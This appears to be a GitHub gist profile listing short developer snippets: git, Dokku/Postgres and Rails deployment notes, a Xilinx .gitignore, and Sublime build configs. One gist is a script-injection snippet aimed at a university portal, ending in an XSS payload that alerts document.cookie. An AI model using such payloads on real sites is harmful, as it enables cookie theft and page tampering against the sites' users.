Skip to content

Instantly share code, notes, and snippets.

View lopezjurip's full-sized avatar
🎯
Focusing

Patricio López Juri lopezjurip

🎯
Focusing
View GitHub Profile
@lopezjurip
lopezjurip / gist:618b053b9ab1f948f1b2
Created February 3, 2015 13:10
Commit file and stop tracking
// Lets say we have a file with path 'Project/Private/APIKEYS.txt'
git add Project/Private/APIKEYS.txt
git commit -m "added empty APIKEY file"
git push origin master
// Stop tracking
git update-index --assume-unchanged Project/Private/APIKEYS.txt
// Track again
@lopezjurip
lopezjurip / gist:0634262b5bb070684626
Created February 9, 2015 16:07
Dokker + Postgres, avoiding "PG::ConnectionBad: could not connect to server: Connection refused"
# Create database, save Url for later use, let's call it <saved_url>
dokku postgresql:create <database>
# Link
dokku postgresql:link <app_name> <database>
# Check db url
dokku config <app_name> | grep DATABASE_URL
# if saved url is not equals to the last displayed, then:
@lopezjurip
lopezjurip / gist:a817e96ec833e7667274
Last active June 9, 2020 22:26
DigitalOcean+Rails+Puma+Dokku+Postgress
# Based on: http://donpottinger.net/blog/2014/11/17/bye-bye-heroku-hello-dokku.html
# Add to gemfile:
ruby '2.1.2'
gem 'pg'
gem 'puma'
gem 'rails_12factor'
gem 'searchkick'
gem 'typhoeus'
@lopezjurip
lopezjurip / gist:c509eadf1e31b45825a9
Created February 10, 2015 01:28
Create Doorkeeper authorization via rails console
app = Doorkeeper::Application.create!(:name => 'myapp', :redirect_uri => 'myapp://oauth/callback')
@lopezjurip
lopezjurip / .gitignore
Last active September 27, 2017 21:47
Xilinx gitignore
#Gitignore for files generated by Xilinx ISE
*.log
*.svf
*.scr
*.cmd
*.bak
*.lso
*.elf
*.ace
@lopezjurip
lopezjurip / gist:97771781262c18a24521
Last active August 29, 2015 14:20
Inyectar Nyancat al Siding (UC)
Este código no es mio.
Autor: Desconocido
<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.4.min.js"></script><br />
<script>//<br />
// Este iframe fallaba<br />
//<iframe src="http://nyan.cat/" width="640" height="480"></iframe><br />
console.log("js injection ");//<br />
var url = "https://raw.github.com/jfix/nyancat/master";//<br />
var keyCode = 16; // shift key<br />
<script>javascript:alert(document.cookie);</script>
@lopezjurip
lopezjurip / macro.sh
Created May 24, 2015 23:57
[Bash] For-each on directories
START_HERE="/Users/user/repositories";
cd $START_HERE;
for d in $(find . -maxdepth 1 -mindepth 1 -type d); do
echo -e "$d";
cd $d;
# Do a barrel roll
git pull;
@lopezjurip
lopezjurip / CSharp.sublime-build
Created May 30, 2015 19:00
Sublime Text 3 - C# Build System
{
"shell": true,
"cmd": ["mcs $file ; mono $file_base_name.exe"],
"selector": "source.cs"
}
@lopezjurip
lopezjurip / JavaScript.sublime-build
Created June 3, 2015 03:20
Sublime Text 3 - JavaScript ES6 build (OSX)
{
"cmd": ["/usr/local/bin/node", "--harmony", "--use-strict", "$file"],
"selector": "source.js"
}